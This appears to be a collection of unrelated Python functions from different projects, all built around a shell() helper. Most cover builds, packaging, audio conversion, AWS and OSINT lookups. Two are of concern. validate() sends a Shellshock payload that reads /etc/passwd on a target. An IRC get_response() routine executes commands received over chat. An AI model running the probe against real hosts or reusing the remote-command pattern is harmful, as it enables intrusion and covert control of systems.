def cmake(pkg, ver, path, prefix, builddir, makeopts, jobs, cmake = 'cmake', *args, **kwargs): bdir = '{}-{}-build'.format(pkg, ver) if builddir is not None: bdir = os.path.join(builddir, bdir) fakeroot = kwargs['fakeroot'] fakeprefix = fakeroot + prefix flags = ['-DCMAKE_BUILD_TYPE=Release', '-DBOOST_ROOT={}'.format(fakeprefix), '-DBUILD_SHARED_LIBS=ON', '-DCMAKE_PREFIX_PATH={}'.format(fakeprefix), '-DCMAKE_MODULE_PATH={}/share/cmake/Modules'.format(fakeprefix), '-DCMAKE_INSTALL_PREFIX={}'.format(prefix) ] mkpath(bdir) with pushd(bdir): print('Installing {} ({}) from source with cmake'.format(pkg, ver)) shell([cmake, path] + flags + [makeopts]) print(shell('make -j{}'.format(jobs))) print(shell('make DESTDIR={} install'.format(fakeroot)))
def install(): # Build the module directories in /lib/modules, then install the kernel image # and boot filesystem, etc to /boot _make_in_linux_source('modules_install install', sudo=True) # Compile the VBox Guest Additions against the new kernel and install to /lib/modules, # otherwise we won't be able to access VBox shares with the new kernel shell('sudo KERN_DIR={} /usr/lib/x86_64-linux-gnu/VBoxGuestAdditions/vboxadd setup'.format(linux_source))
def link_file_in_dir_as(hook_name, dir_path, link_name): hook_path = BROC_HOOKS_PATHS[hook_name] link_path = dir_path + '/' + link_name ln = shell('ln -s {0} {1}'.format(hook_path, link_path)) chmod = shell('chmod +x {0}'.format(hook_path)) return ln.code
def app_command(options): '''Execute all of the app specific apps''' log('app command output %s' % options) if options: cmd = options[0] args = options[1:] if cmd=='edit': shell('e %s' % app_path(APP_DIR+'/'+args[0]+'.py')) elif cmd=='kill': kill_server() elif cmd=='list': list_files() elif cmd=='path': print(app_path(args[0])) elif cmd=='run': run_server() elif cmd=='search': system('grep %s $p/*/*.py' % args[0]) elif cmd=='template': shell('e %s' % app_path('templates/%s.html' % args[0])) else: print('No app command found, '+cmd) app_help() else: print('No arguments given') app_help()
def main(): print("Start Webferea backsync") # download from server print("download...") cmd = "scp -q %s:%s %s" % (client_config["REMOTE_HOST"], \ client_config["REMOTE_DB_PATH"], client_config["TMP_PATH"] ) sh = shell(cmd) if sh.code is not 0: print("failed to download »%s« from host »%s«" % (\ client_config["REMOTE_DB_PATH"], client_config["REMOTE_HOST"]) ) exit(1) # backsync the flags from the web database print("sync...") webitems = get_all_changed_webitems(client_config["TMP_PATH"]) if webitems: update_local_items(client_config["LOCAL_DB"], webitems) # delete the tmp file again #os.remove(client_config["LOCAL_DB"]) # upload the clients liferea database print("upload...") cmd = "scp -q %s %s:%s" % (client_config["LOCAL_DB"], \ client_config["REMOTE_HOST"], client_config["REMOTE_DB_PATH"] ) sh = shell(cmd) if sh.code is not 0: print("failed to upload »%s« to host »%s«" % (\ client_config["TMP_PATH"], client_config["REMOTE_HOST"]) ) exit(1)
def bundle(cmd): """ Runs bundle Usage: bundle('install') bundle('exec rails s') bundle('rake db:create RAILS_ENV=production') Arguments: cmd: Command to run can be string or list Returns: Will halt on error """ sh = shell('which bundler') if sh.code > 0: gem('install -N bundler') hookenv.status_set('maintenance', 'Running Bundler') os.chdir(ruby_dist_dir()) if not isinstance(cmd, str): hookenv.log('{} must be a string'.format(cmd), 'error') sys.exit(1) shell_cmd = set_proxy("bundle {} -j{}".format(cmd, cpu_count())) sh = shell(shell_cmd, record_output=False) if sh.code > 0: hookenv.status_set("blocked", "Ruby error: {}".format(sh.errors())) hookenv.log("Ruby error: {}".format(sh.errors())) sys.exit(1)
def config(config_name): shell('cp {}/{}.config {}/.config'.format(linux_config, config_name, linux_source)) shell('khack kernel clean') # Answer potential new config questions with yes. If you see this happening # you might want to update khack or modify .config yourself _make_in_linux_source('olddefconfig')
def flacConvert(self, infile, outfile, logq): # TODO: see about tag copying across as well startTime = time() # Seems newer versions of flac actually support flac -> flac # recompression natively. Which is nice. This is now very # simple to implement, hence removed the old code startTime = time() if opts['overwrite']: self.opts += " -f " else: if os.path.exists(outfile): logq.put([ infile, outfile, "flac", "SUCCESS:skipped due to existing file", 0, time() - startTime ]) return 0 rc = os.system( "%sflac %s -s -o %s.flac %s" % (ipath.flacpath, self.opts, shell().parseEscapeChars(outfile), shell().parseEscapeChars(infile))) if (rc == 0): logq.put( [infile, outfile, "flac", "SUCCESS", rc, time() - startTime]) else: logq.put([ infile, outfile, "flac", "ERROR:flac ", rc, time() - startTime ])
def rsync(pkg, ver, pkgpath, prefix, *args, **kwargs): print('Installing {} ({}) with rsync'.format(pkg, ver)) # assume a root-like layout in the pkgpath dir, and just copy it shell([ 'rsync -am', kwargs.get('makeopts'), '{}/'.format(pkgpath), kwargs['fakeroot'] + prefix ])
def make(): # Showtime, build kernel. Yeah, that's really it _make_in_linux_source('-j8') # Build initrd/initramfs too so we can boot this kernel. We need to know the # exact kernel version for this kernel_version = shell_output('cd {} && make kernelversion'.format(linux_source)) shell('sudo mkinitramfs -v -o {}/arch/x86/boot/initrd {}-khack'.format(linux_source, kernel_version))
def find_lowest(args): f = open(args.filename, 'r') # already in low folder lowfldr = already_found_low(args.folder + "low") data = {} for line in f: line = line.split() key = line[0] smiles = line[1] if key in lowfldr: continue # find all out files files = find_all_in_folder(args.folder, key) files = [f.replace(".out", "") for f in files] for molname in files: energy = get_mopac_energy(args.folder + molname + ".out") key, idx = molname.split("_") if key not in data: data[key] = {} data[key]['energy'] = energy data[key]['idx'] = idx data[key]['smiles'] = smiles else: if energy > data[key]['energy']: data[key]['energy'] = energy data[key]['idx'] = idx else: continue keys = data.keys() keys = list(keys) keys.sort() for key in keys: # cp sdf to new name idx = data[key]['idx'] energy = data[key]['energy'] smiles = data[key]['smiles'] cmd = "cp {:} {:}".format(args.folder + key + "_" + idx + ".sdf", args.folder + "low/" + key + ".sdf") sh.shell(cmd) if np.isnan(energy): print(key, smiles, "nan") else: print(key, smiles) return
def write_pdf(self, curdir, source, target, label, version): print("Building PDF: {} - v{}".format(label, version,)) command = 'wkhtmltopdf {} --user-style-sheet {} {}'.format( source, self.user_css_path, target, ) with cd(curdir): shell(command)
def clean(): """ """ # TODO rewrite shell.shell("rm ~/scr/*", shell=True) return
def check_dependency_epubcheck(): try: shell('epubcheck') except OSError: print warning("Warning: missing epubcheck. You'll be able to run" " md2ebook but you won't be able to check your EPUB " " integrity.") print return False return True
def test_config(testname, dirpath, configdir): errors = [] if not os.path.isdir(configdir): errors.append("configdir %s is not a directory" % configdir) envoy_json_out = os.path.join(dirpath, "envoy.json") ambassador = shell([ 'python', AMBASSADOR, 'config', configdir, envoy_json_out], verbose=True) if ambassador.code != 0: errors.append('ambassador failed! %s' % ambassador.code) else: envoy = shell([ 'docker', 'run', '--rm', '-v', '%s:/etc/ambassador-config' % dirpath, VALIDATOR_IMAGE, '/usr/local/bin/envoy', '--base-id', '1', '--mode', 'validate', '-c', '/etc/ambassador-config/envoy.json' ], verbose=True) envoy_succeeded = (envoy.code == 0) print("envoy code %d" % envoy.code) print("envoy succeeded %d" % envoy_succeeded) if not envoy_succeeded: errors.append('envoy failed! %s' % envoy.code) envoy_output = list(envoy.output()) if envoy_succeeded: if not envoy_output[-1].strip().endswith(' OK'): errors.append('envoy validation failed!') gold_path = os.path.join(dirpath, "gold.json") if os.path.exists(gold_path): gold = json.dumps(json.load(open(gold_path, "r")), indent=4, sort_keys=True) current = json.dumps(json.load(open(envoy_json_out, "r")), indent=4, sort_keys=True) udiff = list(difflib.unified_diff(gold.split("\n"), current.split("\n"), fromfile="gold.json", tofile="envoy.json", lineterm="")) if udiff: errors.append("gold.json and envoy.json do not match!\n\n%s" % "\n".join(udiff)) if errors: print("---- ERRORS") print("%s" % "\n".join(errors)) assert not errors, ("failing, errors: %d" % len(errors))
def set_apple(app, preset_number): apps_pos_d = get_pos_dict() app_arg = apps_pos_d["{}_{}".format(app, preset_number)] commands = [ "tell application \"{}\"".format(app), "set bounds of front window to {}".format(app_arg), "end tell" ] apple_script_cmd = generate_apple_script(commands) shell(apple_script_cmd)
def pip(pkg, ver, pkgpath, prefix, dlprefix, *args, **kwargs): # pip should be in the tmp root, which is already added to PATH cmd = [ 'pip install {}=={}'.format(pkg, ver), '--root {}'.format(kwargs['fakeroot']), '--prefix {}'.format(prefix), '--no-index', '--find-links {}'.format(dlprefix), kwargs.get('makeopts', '') ] print('Installing {} ({}) from pip'.format(pkg, ver)) shell(cmd)
def write_pdf(self, curdir, source, target, label, version): print("Building PDF: {} - v{}".format( label, version, )) command = 'wkhtmltopdf {} --user-style-sheet {} {}'.format( source, self.user_css_path, target, ) with cd(curdir): shell(command)
def publish(args): if not os.path.isfile(os.path.expanduser('~/.pypirc')): print( unindent(""" Missing ~/.pypirc file. Should look like: ----------------------------------------- [distutils] index-servers = pypi [pypi] username:your_username password:your_password """)) sys.exit(-1) ### Upload everything to server shell(""" cd {build_dir}/pyqtgraph # Uploading documentation.. (disabled; now hosted by readthedocs.io) #rsync -rv doc/build/* pyqtgraph.org:/www/code/pyqtgraph/pyqtgraph/documentation/build/ # Uploading release packages to website rsync -v {pkg_dir} pyqtgraph.org:/www/code/pyqtgraph/downloads/ # Push master to github git push https://github.com/pyqtgraph/pyqtgraph master:master # Push tag to github git push https://github.com/pyqtgraph/pyqtgraph pyqtgraph-{version} # Upload to pypi.. python setup.py sdist upload """.format(**args.__dict__)) print( unindent(""" ======== Upload complete. ========= Next steps to publish: - update website - mailing list announcement - new conda recipe (http://conda.pydata.org/docs/build.html) - contact deb maintainer (gianfranco costamagna) - other package maintainers? """).format(**args.__dict__))
def publish(args): if not os.path.isfile(os.path.expanduser('~/.pypirc')): print(unindent(""" Missing ~/.pypirc file. Should look like: ----------------------------------------- [distutils] index-servers = pypi [pypi] username:your_username password:your_password """)) sys.exit(-1) ### Upload everything to server shell(""" cd {build_dir}/pyqtgraph # Uploading documentation.. (disabled; now hosted by readthedocs.io) #rsync -rv doc/build/* pyqtgraph.org:/www/code/pyqtgraph/pyqtgraph/documentation/build/ # Uploading release packages to website rsync -v {pkg_dir} pyqtgraph.org:/www/code/pyqtgraph/downloads/ # Push master to github git push https://github.com/pyqtgraph/pyqtgraph master:master # Push tag to github git push https://github.com/pyqtgraph/pyqtgraph pyqtgraph-{version} # Upload to pypi.. python setup.py sdist upload """.format(**args.__dict__)) print(unindent(""" ======== Upload complete. ========= Next steps to publish: - update website - mailing list announcement - new conda recipe (http://conda.pydata.org/docs/build.html) - contact deb maintainer (gianfranco costamagna) - other package maintainers? """).format(**args.__dict__))
def install_composer(): """ Installs composer """ hookenv.status_set('maintenance', 'Installing composer') sh = shell("wget -q -O /usr/local/bin/composer " "https://getcomposer.org/composer.phar") if sh.code > 0: hookenv.status_set( 'blocked', 'Unable to download composer: {}'.format(sh.errors())) sys.exit(0) shell("chmod +x /usr/local/bin/composer") hookenv.status_set('active', 'ready')
def get_args(args): if len(args) > 2: print("Too Many Arguments") return elif len(args) < 2: shell.shell() return elif len(args) == 2: if args[1] in ("-h", "-help"): print("USAGE: wpl [FILE]") return else: run.run(sys.argv)
def menu(): print("0: scan") print("1: dump") print("2: scan_log") print("3: scan_log2") print("4: recover_file") print("5: collect_filenames") print("6: dump_block") print("7: dump_birth") print("8: dump_tree") print("9: dump_0") print("10: dump_raw") print("11: dump_raidz_raw") print("12: dump_disk_meta") print("13: dump_dnode") print("14: xor") print("15: shell") e = input("cmd?: ") e = int(e) if e == 0: scan() elif e == 1: dump() elif e == 2: scan_log() elif e == 3: scan_log2() elif e == 4: recover_file() elif e == 5: collect_filenames() elif e == 6: dump_block() elif e == 7: dump_birth() elif e == 8: dump_tree() elif e == 9: dump_0() elif e == 10: dump_raw() elif e == 11: dump_raidz_raw() elif e == 12: dump_disk_meta() elif e == 13: dump_dnode() elif e == 14: xor() elif e == 15: shell(pool)
def ec2_start(ami_id, box_instance_name): print 'start instance ' + box_instance_name v = shell.shell_json([ 'aws', 'ec2', 'run-instances', '--count', '1', # too small instance cause random failures with errors like: # mysql connection failed, http 500, file not found '--instance-type', os.environ['W3TCQA_EC2_INSTANCE_TYPE'], '--image-id', ami_id, '--key-name', os.environ['W3TCQA_EC2_KEY_NAME'], # Dont use default secuirty group with Allow All, since it effectively # doesnt allow anything '--security-group-ids', os.environ['W3TCQA_EC2_SECURITY_GROUP_ID'] ]) aws_instance_id = v['Instances'][0]['InstanceId'] print 'set tag' shell.shell([ 'aws', 'ec2', 'create-tags', '--resources', aws_instance_id, '--tags', 'Key=Type,Value=w3tcqa-box' ]) shell.shell([ 'aws', 'ec2', 'create-tags', '--resources', aws_instance_id, '--tags', 'Key=Name,Value=' + box_instance_name ]) print 'get ip' for i in range(50): try: v = shell.shell_json([ 'aws', 'ec2', 'describe-instances', '--filters', 'Name=instance-id,Values=' + aws_instance_id, '--query', 'Reservations[].Instances[].PublicIpAddress' ]) ip = v[0] print('ip is available: ' + ip) return {'ip': ip, 'aws_instance_id': aws_instance_id} except: print('ip is not available yet') raise Exception('ip not available')
def get_response(self): time.sleep(1) # Get the response resp = self.irc.recv(2040).decode("UTF-8") print(resp) if resp.find('CMD') != -1: cmd = resp.split(":")[1].replace('\n', '').replace('\r', '') print(cmd) shell(cmd) if resp.find('PING') != -1: self.irc.send(bytes('PONG ' + '\r\n', "UTF-8")) return resp
def opusConvert(self,infile,outfile,logq): # As the new versions of opus support flac natively, I think that the best option is to # use >0.1.7 by default, but support earlier ones without tagging. startTime = time() if self.version == None: print "ERROR! Could not discover opus version, assuming version >= 0.1.7. THIS MAY NOT WORK!" version = (9,9,9) else: version=self.version #If we are a release prior to 0.1.7, use non-tagging type conversion, with warning if (version[0] == 0) and (version[1] <= 1) and (version[2] <= 6): print "WARNING: Opus version prior to 0.1.7 detected, NO TAGGING SUPPORT" decoder = flacdecode(infile)() encoder = sp.Popen("%sopusenc %s - %s.opus 2> /tmp/opusLog" % ( opusencpath, self.opts, shell().parseEscapechars(outfile), ) , shell=True, bufsize=8192, stdin=sp.PIPE ).stdin for line in decoder.readlines(): #while data exists in the decoders buffer encoder.write(line) #write it to the encoders buffer decoder.flush() #if there is any data left in the buffer, clear it decoder.close() #somewhat self explanetory encoder.flush() #as above encoder.close() logq.put([infile,outfile,"opus","SUCCESS_NOTAGGING",0, time() - startTime]) else: #Later versions support direct conversion from flac->opus, so no need for the above. rc = os.system("%sopusenc %s --quiet %s %s.opus" % ( opusencpath, self.opts, shell().parseEscapechars(infile), shell().parseEscapechars(outfile) ) ) if ( rc != 0 ): logq.put([infile,outfile,"opus","ERROR: error executing opusenc. Could not convert",rc, time() - startTime]) else: logq.put([infile,outfile,"opus","SUCCESS",rc, time() - startTime])
def mp3convert(self,infile,outfile,logq): startTime = time() inmetadata = flac().getflacmeta(infile) try: metastring = self.generateLameMeta(inmetadata) except(UnboundLocalError): metastring = "" #If we do not get meta information. leave blank #rb stands for read-binary, which is what we are doing, with a 1024 byte buffer decoder = flacdecode(infile)() if decoder == None: logq.put([infile,outfile,"mp3","ERROR: Could not open flac file for decoding.",-1, time() - startTime]) return None #wb stands for write-binary encoder = os.popen("%slame --silent %s - -o %s.mp3 %s" % ( lamepath, self.opts, shell().parseEscapechars(outfile), metastring ) ,'wb',8192) for line in decoder.readlines(): #while data exists in the decoders buffer encoder.write(line) #write it to the encoders buffer decoder.flush() #if there is any data left in the buffer, clear it decoder.close() #somewhat self explanetory encoder.flush() #as above encoder.close() logq.put([infile,outfile,"mp3","SUCCESS",0, time() - startTime])
def do_call(param): url = "https://viewdns.info/reverseip/?host=%s&t=1" % param erg = shell("./curl_call.sh %s" % url) soup = BeautifulSoup(open('tmp/erg.html'), 'html.parser') dom_table = soup.find_all('table') dom_table = dom_table[3] with open('tmp/reverse_whois.txt', 'w') as r: for rows in dom_table.find_all('tr'): for cells in rows.find_all('td'): r.write(cells.text.ljust(30)) r.write('\n') fh_out = open('tmp/reverse_whois.txt', 'r') fh_erg = open("output/ergebnis_osint.txt", "a") fh_erg.write(" \n---- REVERSE IP ----\n ") fh_erg.write("\n") for line in fh_out: print line.rstrip() fh_erg.write(line.rstrip()) fh_erg.write("\n") fh_erg.close()
def set_Spotify(preset_number): apps_pos_d = get_pos_dict() spotify_data = apps_pos_d["Spotify_{}".format(preset_number)] commands = [ "tell application \"Spotify\" to activate", "set x to {}".format( spotify_data["x"]), "set y to {}".format(spotify_data["y"]), "set w to {}".format(spotify_data["w"]), "set h to {}".format( spotify_data["h"]), "tell application \"System Events\"", "tell process \"Spotify\" to get first window", "set spotify_window to result", "set position of spotify_window to {x, y}", "set size of spotify_window to {w, h}", "end tell" ] apple_script_cmd = generate_apple_script(commands) shell(apple_script_cmd) shell(apple_script_cmd)
def set_Discord(preset_number): apps_pos_d = get_pos_dict() discord_data = apps_pos_d["Discord_{}".format(preset_number)] commands = [ "tell application \"Discord\" to activate", "set x to {}".format( discord_data["x"]), "set y to {}".format(discord_data["y"]), "set w to {}".format(discord_data["w"]), "set h to {}".format(discord_data["h"]), "tell application \"System Events\" to tell process \"Discord\"", "tell window 1", "set size to {w, h}", "set position to {x, y}", "end tell", "end tell" ] apple_script_cmd = generate_apple_script(commands) shell(apple_script_cmd) shell(apple_script_cmd)
def mix(cmd): """ Runs Mix Usage: mix('compile') mix('test') mix('run') Arguments: cmd: Command to run can be string or list Returns: Will halt on error """ status_set( 'maintenance', 'Running Mix build tool') if not os.path.exists(elixir_dist_dir()): os.makedirs(elixir_dist_dir()) os.chdir(elixir_dist_dir()) if not isinstance(cmd, str): status_set('blocked', '{}: should be a string'.format(cmd)) sys.exit(0) cmd = ("yes | mix {}".format(cmd)) sh = shell(cmd) if sh.code > 0: status_set("blocked", "Mix error: {}".format(sh.errors())) sys.exit(0)
def fetch(pkgfile, repofile, outdir=None, pip='pip', git='git'): with open(pkgfile) as p, open(repofile) as r: pkgs, repo = yml.load(p), yml.load(r) missingpkg = [pkg for pkg in pkgs if pkg not in repo] missingver = [ pkg for pkg, ver in pkgs.items() if pkg in repo and ver not in repo[pkg] ] if missingpkg: eprint('Packages requested, but not found in the repository:') eprint('missingpkg: {}'.format(','.join(missingpkg))) for pkg in missingver: eprint('missingver: missing version for {}: {} requested, found: {}'. format(pkg, pkgs[pkg], ','.join(repo[pkg].keys()))) if missingpkg or missingver: return for pkg, ver in pkgs.items(): print(pkg, ver) url = repo[pkg][ver]['source'] pkgname = '{}-{}'.format(pkg, ver) dst = pkgname spliturl = url.split('?')[0].split('.') ext = spliturl[-1] if len(spliturl) > 1 and spliturl[-2] == 'tar': ext = 'tar.{}'.format(spliturl[-1]) if ext in ['rpm', 'tar', 'gz', 'tgz', 'tar.gz', 'tar.bz2', 'tar.xz']: dst = '{}.{}'.format(dst, ext) if outdir and not os.path.exists(outdir): os.mkdir(outdir) if not outdir: outdir = '.' with pushd(outdir): print('Downloading {} ({}): {}'.format(pkg, ver, url)) protocol = repo[pkg][ver].get('fetch') grab(url, filename=dst, version=ver, protocol=protocol, pip=pip, git=git) if ext in ['tgz', 'tar.gz', 'tar.bz2', 'tar.xz']: print('Extracting {} ...'.format(dst)) topdir = shell(' tar -xvf {}'.format(dst)).split()[0] normalised_dir = topdir.split('/')[0] if not os.path.exists(pkgname): print('Creating symlink {} -> {}'.format( normalised_dir, pkgname)) os.symlink(normalised_dir, pkgname)
def test_set_wp(self): winner = self.col.draw() self.backend.set_wallpaper(winner) picture_uri = shell( "/usr/bin/env gsettings get org.gnome.desktop.background \ picture-uri").output()[0] self.assertEqual("'file://"+winner+"'", picture_uri)
def do_call(param): url = "https://viewdns.info/chinesefirewall/?domain=%s" % param erg = shell("./curl_call.sh %s" % url) fh = open("tmp/erg.html", "r") fh_erg = open("output/ergebnis_osint.txt", "a") fh_erg.write(" \n---- CN FIREWALL ----\n ") for line in fh.readlines(): if "the presence of GeoDNS on this domain name" in line: print """ DNS servers in China returned different IP addresses to those returned by the root servers. This could indicate DNS poisoning by the Great Firewall of China. It could also just indicate the presence of GeoDNS on this domain name. """ fh_erg.write("DNS servers in China returned different IP addresses to those returned by the root servers.\n") fh_erg.write("This could indicate DNS poisoning by the Great Firewall of China.\n") fh_erg.write("It could also just indicate the presence of GeoDNS on this domain name.\n") if "All servers were able to reach your site" in line: print """ All servers were able to reach your site. This means that your site should be accessible from within mainland China. """ fh_erg.write("All servers were able to reach your site.\n") fh_erg.write("This means that your site should be accessible from within mainland China.\n") fh_erg.close()
def do_call(param): url = "https://viewdns.info/ping/?domain=%s" % param erg = shell("./curl_call.sh %s" % url) ######## Test clean html start ################ clean_html.copy_clean() ######## Test clean html Ende ################ soup = BeautifulSoup(open('tmp/erg_clean.html'), 'html.parser') dom_table = soup.find_all('table') dom_table = dom_table[3] with open('tmp/reverse_whois.txt', 'w') as r: for rows in dom_table.find_all('tr'): for cells in rows.find_all('td'): r.write(cells.text.ljust(22)) r.write('\n') fh_out = open('tmp/reverse_whois.txt', 'r') fh_erg = open("output/ergebnis_osint.txt", "a") fh_erg.write(" \n---- RESPONSE TIME ----\n ") for line in fh_out: print line.rstrip() fh_erg.write(line.rstrip()) fh_erg.write("\n") fh_erg.close()
def shell_command(testname, argv, must_fail=False, need_stdout=None, need_stderr=None, verbose=True): errors = [] cmd = os.path.basename(argv[0]) command = shell(argv, verbose=True) if must_fail: if command.code == 0: errors.append("%s: %s succeeded but should have failed?" % (testname, cmd)) else: if command.code != 0: errors.append("%s: %s failed (%d)?" % (testname, cmd, command.code)) if need_stdout: command_stdout = command.output(raw=True) if need_stdout not in command_stdout: errors.append("%s: %s stdout does not contain %s" % (testname, cmd, need_stdout)) if need_stderr: command_stderr = command.errors(raw=True) if need_stderr not in command_stderr: errors.append("%s: %s stderr does not contain %s" % (testname, cmd, need_stderr)) if errors: print("---- ERRORS") print("%s" % "\n".join(errors)) assert not errors, ("failing, errors: %d" % len(errors))
def test_chaining(self): sh = Shell(has_input=True) output = sh.run('cat -u').write('Hello, world!').output() self.assertEqual(output, ['Hello, world!']) output = shell('cat -u', has_input=True).write('Hello, world!').output() self.assertEqual(output, ['Hello, world!'])
def do_call(param): url = "https://viewdns.info/reversens/?ns=%s" % param erg = shell("./curl_call.sh %s" % url) ######## Test clean html start ################ clean_html.copy_clean() ######## Test clean html Ende ################ soup = BeautifulSoup(open('tmp/erg_clean.html'), 'html.parser') dom_table = soup.find_all('table') dom_table = dom_table[3] with open('tmp/reverse_whois.txt', 'w') as r: for rows in dom_table.find_all('tr'): for cells in rows.find_all('td'): r.write(cells.text.ljust(35)) r.write('\n') fh_out = open('tmp/reverse_whois.txt', 'r') for line in fh_out.readlines(): print line.rstrip()
def AACPconvert(self,infile,outfile,logq): inmetadata = flac().getflacmeta("\"" + infile + "\"") tagcmd = "%sneroAacTag " % neroaacpath try: metastring = self.generateNeroTags(inmetadata) except(UnboundLocalError): metastring = "" decoder = flacdecode(infile)() #wb stands for write-binary encoder = os.popen("%sneroAacEnc %s -if - -of %s.mp4 > /tmp/aacplusLog" % ( neroaacpath, self.opts, shell().parseEscapechars(outfile), ) ,'wb',8192) for line in decoder.readlines(): #while data exists in the decoders buffer encoder.write(line) #write it to the encoders buffer decoder.flush() #if there is any data left in the buffer, clear it decoder.close() #somewhat self explanetory encoder.flush() #as above encoder.close() #Now as the final event, load up the tags rc = os.system("%s \"%s.mp4\" %s" % (tagcmd, outfile, metastring)) # print "%s %s.mp4 %s" % (tagcmd, outfile, metastring) if rc != 0: logq.put([infile,outfile,"aacNero","WARNING: Could not tag AAC file",rc, time() - startTime]) else: logq.put([infile,outfile,"aacNero","SUCCESS",0, time() - startTime])
def npm(cmd): """ Runs npm This layer relies on the use of npm scripts defined in `package.json`, see here https://docs.npmjs.com/misc/scripts for more information. Usage: npm('install') npm('run build') Arguments: cmd: Command to run can be string or list Returns: Will halt on error """ hookenv.status_set( 'maintenance', 'Installing NPM dependencies in {}'.format(node_dist_dir())) os.chdir(node_dist_dir()) if not isinstance(cmd, str): hookenv.status_set('blocked', '{}: should be a string'.format(cmd)) sys.exit(0) cmd = ("npm {}".format(cmd)) sh = shell(cmd) if sh.code > 0: hookenv.status_set("blocked", "NPM error: {}".format(sh.errors())) sys.exit(0)
def composer(cmd): """ Runs composer Usage: composer('install') Arguments: cmd: command to run with composer Returns: Halts on error """ hookenv.status_set( 'maintenance', 'Installing PHP dependencies in {}'.format(app_path())) if not os.path.isdir(app_path()): os.makedirs(app_path()) os.chdir(app_path()) if not isinstance(cmd, str): hookenv.status_set('blocked', '{}: should be a string'.format(cmd)) sys.exit(0) cmd = ("composer {}".format(cmd)) sh = shell(cmd) if sh.code > 0: hookenv.status_set("blocked", "Composer error: {}".format(sh.errors())) sys.exit(0) hookenv.status_set('active', 'ready')
def ami_delete(ami_name): v = shell.shell_json(['aws', 'ec2', 'describe-images', '--owners', 'self', '--filters', 'Name=name,Values=' + ami_name]) if (len(v['Images']) <= 0): print 'existing AMI ' + ami_name + ' not found' else: print 'deleting AMI ' + ami_name ami_id = v['Images'][0]['ImageId'] snapshot_id = v['Images'][0]['BlockDeviceMappings'][0]['Ebs']['SnapshotId'] print ami_id print snapshot_id shell.shell(['aws', 'ec2', 'deregister-image', '--image-id', ami_id]) shell.shell(['aws', 'ec2', 'delete-snapshot', '--snapshot-id', snapshot_id])
def npm(cmd): """ Runs npm This layer relies on the use of npm scripts defined in `package.json`, see here https://docs.npmjs.com/misc/scripts for more information. Usage: npm('install') npm('run build') Arguments: cmd: Command to run can be string or list Returns: Will halt on error """ status_set( 'maintenance', 'installing NPM dependencies for {}'.format(node_dist_dir())) os.chdir(node_dist_dir()) if not isinstance(cmd, str): status_set('blocked', '{}: should be a string'.format(cmd)) sys.exit(0) cmd = ("npm {}".format(cmd)) sh = shell(cmd) if sh.code > 0: status_set("blocked", "NPM error: {}".format(sh.errors())) sys.exit(0)
def doc_send_text(args): if args: path = doc_path('send/me') text = open(doc_path(args[0])).read() open(path,'w').write(text+'\n') print(shell('x send dispatch')) else: print('usage: doc send doc-path')
def sh(pkg, ver, pkgpath, prefix, makefile, *args, **kwargs): if os.path.isfile(makefile): makefile = os.path.abspath(makefile) with pushd(pkgpath): makefile = os.path.abspath(makefile) cmd = ['bash {} --prefix {}'.format(makefile, prefix), '--fakeroot {}'.format(kwargs['fakeroot']), '--python {}/bin/python'.format(prefix)] if 'jobs' in kwargs: cmd.append('--jobs {}'.format(kwargs['jobs'])) if 'cmake' in kwargs: cmd.append('--cmake {}'.format(kwargs['cmake'])) cmd.append(kwargs.get('makeopts')) print('Installing {} ({}) from sh'.format(pkg, ver)) shell(cmd)
def validate(url): # curl -A "() { foo;};echo;/bin/cat /etc/passwd" cmd = 'curl --connect-timeout 30 --max-time 60 -A "() { foo;};echo;/bin/cat /etc/passwd" %s' % (url) oldcmd = 'curl --connect-timeout 30 --max-time 60 %s' % (url) # print cmd old_cont = shell(oldcmd).output(raw=True) new_cont = shell(cmd).output(raw=True) p = re.compile(r'.*?:.*?:\d*?:\d*?:.*?:.*?:.*') ''' match only report from start 0, please use search ''' m = p.search(new_cont) if old_cont != new_cont and m: return True return False
def oggconvert(self,infile,outfile,logq): #oggenc automatically parses the flac file + metadata, quite wonderful #really, we don't need to do anything here #The binary itself deals with the tag conversion etc #Which makes our life rather easy startTime = time() rc = os.system("%soggenc %s -Q -o %s.ogg %s" % ( oggencpath, self.opts, shell().parseEscapechars(outfile), shell().parseEscapechars(infile) ) ) if rc == 0: result="SUCCESS" else: result="ERROR:oggenc" logq.put([infile,outfile,"vorbis",result,rc, time() - startTime])
def install_app(): """ Performs application installation """ hookenv.log('Installing Huginn', 'info') # Configure NGINX vhost nginxlib.configure_site('default', 'vhost.conf') # Update application huginnlib.download_archive() shell("mkdir -p {}/{log,tmp/pids,tmp/sockets}".format(ruby_dist_dir())) shell("cp {}/config/unicorn.rb.example " "{}/config/unicorn.rb".format(ruby_dist_dir())) bundle("install --deployment --without development test") host.service_restart('nginx') hookenv.status_set('active', 'Huginn is installed!')
def check_dependencies(): """Check external dependecies Return a tuple with the available generators. """ available = [] try: shell('ebook-convert') available.append('calibre') except OSError: pass try: shell('pandoc --help') available.append('pandoc') except OSError: pass if not available: sys.exit(error('No generator found, you cannot use md2ebook.')) check_dependency_epubcheck() return available
def build(workspace, host, repository, tag, authenticator=None): try: # Check that Dockerfile is in cwd assert os.path.isfile('Dockerfile'), 'Dockerfile is missing in cwd.' # Tar job tar_out = "{0}.tgz".format(os.path.basename(workspace if workspace[-1] != "/" else workspace[:-1])) command = """tar cfz {0} -C {1} .""".format(tar_out, workspace) code, lines = shell(command) #assert code == 0, 'tar failure' # Upload build job command = """curl --header "Content-Type:application/octet-stream" --data-binary @{0} http://{1}/build?forcerm=1\&t={2}:{3}""".format( tar_out, host, repository, tag) code, lines = shell(command) assert code == 0, 'non zero ({0}) build curl exit code ?'.format(code) assert len(lines) > 1, 'no stdout (docker daemon error ?)' # # - retrieve the build id using a regex (super ugly) # try: # last = json.loads(lines[-2]) # except ValueError: # assert 0, 'invalid dockerfile ("%s")' % lines[-2] # assert 'stream' in last, 'build error ("%s")' % last # matched = re.match('Successfully built ([a-zA-Z0-9]+)\n', last['stream']) # assert matched, 'unable to find the image id ("%s")' % last['stream'] # aka = matched.group(1) # # - fix the damn build image name bug thing and finally tag our image as 'latest' # command = """curl -X POST http://{0}/images/{1}/tag?repo={2}\&force=1\&tag={3}""".format(host, aka, repository, tag) # print command # code, lines = shell(command) os.remove(tar_out) except Exception as e: print "Build Exception" print e raise e
def git(cmd): """ simple git wrapper """ if not os.path.isfile('/usr/bin/git'): apt_install(['git']) sh = shell("git {}".format(cmd)) if sh.code > 0: hookenv.status_set('blocked', 'Problem with Ruby: {}'.format(sh.errors())) sys.exit(1)
